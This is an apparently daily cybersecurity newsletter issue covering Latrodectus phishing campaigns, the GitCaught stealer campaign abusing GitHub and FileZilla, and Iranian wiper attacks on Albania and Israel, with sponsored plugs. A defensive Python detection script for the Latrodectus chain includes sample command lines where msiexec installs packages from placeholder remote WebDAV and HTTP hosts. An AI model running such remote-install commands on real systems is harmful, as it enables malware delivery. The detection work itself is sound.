Surge in Latrodectus Malware Campaigns

May 21 2024


Welcome to Gone Phishing, your daily cybersecurity newsletter that’s rolling like thunder, deep cyber-under 🙃

Today’s hottest cybersecurity news stories:

  • 🧊 You’re as cold as IcedID, you’re willing to Latrodectus 👾

  • 🍸 Malware cocktail delivered via GitHub and FileZilla 🦖

  • 🗺️ Albania, Israel targeted by MOIS-linked hackers baby 👨‍💻

SupercaliLatrodectusxpialidocious 😂😂😂

🚨 Spike in Latrodectus Malware Campaigns 🚀📧

Cybersecurity researchers have observed a surge in email phishing campaigns since early March 2024, delivering a nascent malware loader named Latrodectus. This malware is believed to be the successor to the infamous IcedID malware.

Infection Chain 🔗🕷️

The campaigns typically use oversized JavaScript files that abuse WMI to invoke msiexec.exe, which installs a remotely hosted MSI file from a WebDAV share. Latrodectus is designed to deploy additional payloads such as QakBot, DarkGate, and PikaBot, allowing threat actors to carry out a range of post-exploitation activities.
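As an added, defender-side illustration of the infection chain just described (example code written for this edition, not from the researchers’ report): a small Python triage routine that flags process-creation telemetry where WmiPrvSE.exe spawns msiexec.exe with an .msi pulled from a WebDAV UNC path or URL. The event field names and sample command lines are constructed, Sysmon-like approximations, and the hostnames are placeholders.

```python
import re
from dataclasses import dataclass

# Remote install sources: WebDAV UNC paths (\\host@80\..., \\host@SSL\...,
# \\host\DavWWWRoot\...) or a plain http(s) URL handed to msiexec /i.
REMOTE_SOURCE = re.compile(
    r"(\\\\[\w.-]+(@(ssl|\d+))?\\[^\s]*|https?://\S+)\.msi\b", re.IGNORECASE)
# msiexec switches that take a package path (/i or /package).
INSTALL_SWITCH = re.compile(r"(^|\s)[/-](i|package)\b", re.IGNORECASE)

@dataclass(frozen=True)
class ProcEvent:
    """Minimal, constructed process-creation record (Sysmon-like fields)."""
    parent_image: str
    image: str
    command_line: str

def _basename(path: str) -> str:
    return path.lower().rsplit("\\", 1)[-1]

def is_suspicious_msiexec(ev: ProcEvent) -> bool:
    """True when WMI (WmiPrvSE.exe) launches msiexec with a remote .msi."""
    if _basename(ev.image) != "msiexec.exe":
        return False
    if _basename(ev.parent_image) != "wmiprvse.exe":
        return False
    return bool(INSTALL_SWITCH.search(ev.command_line)
                and REMOTE_SOURCE.search(ev.command_line))

def triage(events):
    """Return the command lines of events matching the chain."""
    return [ev.command_line for ev in events if is_suspicious_msiexec(ev)]

# Constructed sample telemetry; hostnames and paths are placeholders.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\System32\wbem\WmiPrvSE.exe", r"C:\Windows\System32\msiexec.exe",
              r"msiexec.exe /i \\webdav.example.invalid@80\share\update.msi /q"),
    ProcEvent(r"C:\Windows\System32\wbem\WmiPrvSE.exe", r"C:\Windows\System32\msiexec.exe",
              r"msiexec /i http://webdav.example.invalid/files/setup.msi /qn"),
    # Benign: a deployment agent installing a local package.
    ProcEvent(r"C:\Program Files\Deploy\agent.exe", r"C:\Windows\System32\msiexec.exe",
              r"msiexec /i C:\Packages\tool.msi /qn"),
    # Benign: WMI-launched msiexec repairing an installed product by GUID.
    ProcEvent(r"C:\Windows\System32\wbem\WmiPrvSE.exe", r"C:\Windows\System32\msiexec.exe",
              r"msiexec /f {00000000-0000-0000-0000-000000000000}"),
]

if __name__ == "__main__":
    for line in triage(SAMPLE_EVENTS):
        print("ALERT:", line)
```

The two benign records show why the rule keys on all three signals together: a local package path or a repair switch alone does not fire, even under a WMI parent.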

Advanced Features 🛠️🔒

Latrodectus boasts several sophisticated features:

  • Enumeration and execution capabilities

  • Self-delete technique for erasing running files

  • Masquerades as legitimate software libraries

  • Obfuscates source code and performs anti-analysis checks to evade debugging and sandbox environments

  • Sets up persistence on Windows hosts using a scheduled task

  • Communicates with a C2 server over HTTPS for commands such as collecting system information, updating, restarting, and executing files

New Commands 🆕📝

Recent updates include commands to enumerate files in the desktop directory and retrieve the entire running process ancestry from infected machines. Although designed to download and execute IcedID, this behaviour hasn't been detected in the wild.

Potential Successor to IcedID 🤔🔄

Researchers hypothesise that Latrodectus might be developed as a replacement for IcedID, given their development connections and similar functionalities.

Other Phishing Campaigns 🎣💼

In addition to Latrodectus, other notable phishing campaigns have been observed:

DarkGate Malware: Using QuickBooks invoice-themed emails, phishing campaigns lead users to a malicious JAR file, which executes a PowerShell script to download and launch DarkGate via an AutoIt script.

Phishing-as-a-Service (PhaaS): An updated platform called Tycoon targets Microsoft 365 and Gmail session cookies, bypassing MFA protections with enhanced detection evasion techniques.

D3F@ck Loader: Propagated through Google ads impersonating Calendly and Rufus, this loader drops Raccoon Stealer and DanaBot. It illustrates the evolving MaaS landscape, utilizing Extended Validation certificates to bypass trusted security measures.

Emerging Threats 🕵️‍♂️🔍

New stealer malware families like Fletchen Stealer, WaveStealer, zEus Stealer, and Ziraat Stealer are also on the rise. The Remcos RAT has been spotted using a PrivateLoader module to enhance its capabilities, employing VB scripts, altering the registry, and setting up services to remain undetected.

Conclusion 🔒🚫

The spike in Latrodectus campaigns and other phishing threats underscores the ever-evolving landscape of cyber threats. Organisations must stay vigilant, employ robust security measures, and educate users on phishing risks to mitigate these sophisticated attacks.

The Thrilla in FileZilla 🥊🥊🥊

🚨 Multi-Faceted Campaign Abuses Legitimate Services 🚀🛡️

A sophisticated campaign has been observed leveraging legitimate services like GitHub and FileZilla to distribute a variety of stealer malware and banking trojans, including Atomic (aka AMOS), Vidar, Lumma (aka LummaC2), and Octo. The malware is disguised as credible software such as 1Password, Bartender 5, and Pixelmator Pro.

Broad Targeting Strategy 🌍💻

Recorded Future's Insikt Group, tracking the activity under the moniker GitCaught, notes that the presence of multiple malware variants indicates a broad cross-platform targeting strategy. The use of overlapping C2 infrastructure suggests a centralised command setup, enhancing the efficiency of the attacks.

Attack Chains 🔗📂

Attackers use fake profiles and repositories on GitHub to host counterfeit versions of popular software. These malicious files are embedded within various domains and distributed via malvertising and SEO poisoning campaigns.

Malware Management 🗂️🔍

The threat actors, suspected to be Russian-speaking from the Commonwealth of Independent States (CIS), also utilise FileZilla servers for managing and delivering malware. Analysis reveals that the campaign, active since at least August 2023, aims to deliver malware such as RedLine, Lumma, Raccoon, Vidar, Rhadamanthys, DanaBot, and DarkComet RAT.

Rhadamanthys Pathway 🚪🎣

Victims who visit fake application websites are redirected to payloads hosted on Bitbucket and Dropbox, indicating a wider abuse of legitimate services.

Ongoing Threats ⚠️🍏

Microsoft's Threat Intelligence team has highlighted the ongoing threat of the macOS backdoor codenamed Activator. Distributed via disk image files impersonating cracked software, Activator steals data from Exodus and Bitcoin-Qt wallet applications. It prompts users for elevated privileges, disables macOS Gatekeeper and Notification Center, and deploys malicious Python scripts for persistence.

Key Points 🔑

Campaign Name: GitCaught

Malware Variants: Atomic (AMOS), Vidar, Lumma (LummaC2), Octo, RedLine, Raccoon, Rhadamanthys, DanaBot, DarkComet RAT

Distribution Methods: Fake GitHub profiles, malvertising, SEO poisoning, Bitbucket, Dropbox

Target Platforms: Android, macOS, Windows

Threat Actors: Suspected Russian-speaking from CIS

Conclusion 🔒🚫

This campaign underscores the growing trend of cybercriminals misusing legitimate services to orchestrate attacks. Organisations and individuals must remain vigilant, employing robust cybersecurity measures to protect against these sophisticated threats.

🎣 Catch of the Day!! 🌊🐟🦞

Stay ahead of the curve with Presspool.ai! 🚀 Subscribe to their newsletter for the latest buzz in the information technology space, with a special focus on AI. Their slogan says it all: "Actionable marketing insights for the visionary AI executive." 🤓💡 That’s us, alright! 🤵 How about you? Visionary AI executive, much? 👀

And if the newsletter gets your motor running then you can take a butchers at their cool AI marketing product too which is sure to help you make the most of our new artificial overlords and put them to work for your business 🤖👩‍💻🌐

Rest assured, the process is very straightforward.

You simply:

🆕 Sign Up & Create Campaign

📊 Define your audience, budget, and message to captivate your audience.

🚀 Launch your campaign, as Presspool’s AI matches it with ideal newsletter audiences for optimal reach and conversions. 🎯

🕵️ Finally, you leverage real-time analytics to track performance and refine future strategies. 📈 Elevate your marketing game and stay informed with Presspool.ai! 🌟 Simples! 🦦

Presspool.ai 📰🍊🤖 may just have what you need to succeed. And if the product isn’t for you, the newsletter alone is a gamechanger. And we know newsletters 😉

You make me MOIS 💀💀💀

🚨 Iranian Threat Actor Targets Albania and Israel 💻🌍

An actor affiliated with Iran’s Ministry of Intelligence and Security (MOIS) has been linked to destructive wiping attacks targeting Albania and Israel. The campaigns are conducted under the personas Homeland Justice and Karma, respectively.

Threat Group ⚔️🎯

Cybersecurity firm Check Point tracks this activity under the name Void Manticore, also known as Storm-0842 by Microsoft. The group shows significant overlap with another Iranian group, Scarred Manticore (aka Storm-0861).

Attack Patterns 📈💥

Void Manticore is known for:

  • Albania (since July 2022): Homeland Justice campaigns utilising bespoke wiper malware like Cl Wiper and No-Justice (LowEraser).

  • Israel (post-October 2023): Following the Israel-Hamas war, targeting Windows and Linux systems with wiper malware called BiBi, attributed to the pro-Hamas hacktivist group Karma.

Tactics and Techniques 🛠️🔓

The attack chains are straightforward, leveraging:

  • Publicly available tools

  • Remote Desktop Protocol (RDP)

  • Server Message Block (SMB)

  • File Transfer Protocol (FTP)

Initial access often exploits known vulnerabilities in internet-facing applications, such as CVE-2019-0604. Successful breaches are followed by the deployment of web shells, including Karma Shell, which masquerades as an error page while providing various malicious capabilities.

Collaboration Between Threat Groups 🤝🔗

Void Manticore appears to use access previously obtained by Scarred Manticore for its operations, suggesting a systematic handoff of targets. Microsoft’s investigations into attacks on Albanian governments in 2022 indicated cooperation among multiple Iranian actors:

  • Storm-0861: Initial access and data exfiltration

  • Storm-0842: Ransomware and wiper malware deployment

  • Storm-0166: Further data exfiltration

  • Storm-0133: Probing victim infrastructure

Storm-0861 is linked to APT34 (Cobalt Gypsy, Hazel Sandstorm, Helix Kitten, OilRig), known for wiper malware like Shamoon and ZeroCleare.

Check Point’s Insights 🧠🔍

Check Point highlights that:

  • Techniques overlap in attacks against Israel and Albania, indicating routine coordination.

  • Void Manticore’s dual approach combines psychological warfare with data destruction, amplifying the impact on targeted organisations.

  • This ongoing cooperation and strategic coordination between Iranian cyber actors underscore the sophisticated nature of these campaigns.

πŸ—žοΈ Extra, Extra! Read all about it! πŸ—žοΈ

Every few weeks, we carefully select three hot newsletters to show you. Reputation is everything, so any links we share come from personal recommendation or carefully researched businesses at the time of posting. Enjoy!

  • πŸ›‘οΈ Tl;dr sec: Join 30,000+ security professionals getting the best tools, blog posts, talks, and resources right in their inbox for free every Thursday πŸ“…

  • πŸ’΅Β Crypto Pragmatist: Crypto made simple. Actionable alpha in 5 minutes, 3x a week. Join 47,000+ investors and insiders, for πŸ†“

  • πŸ“ˆΒ Bitcoin Breakdown: The best in Bitcoin, carefully curated by an alien from the future πŸ‘Ύ

Let us know what you think.

So long and thanks for reading all the phish!
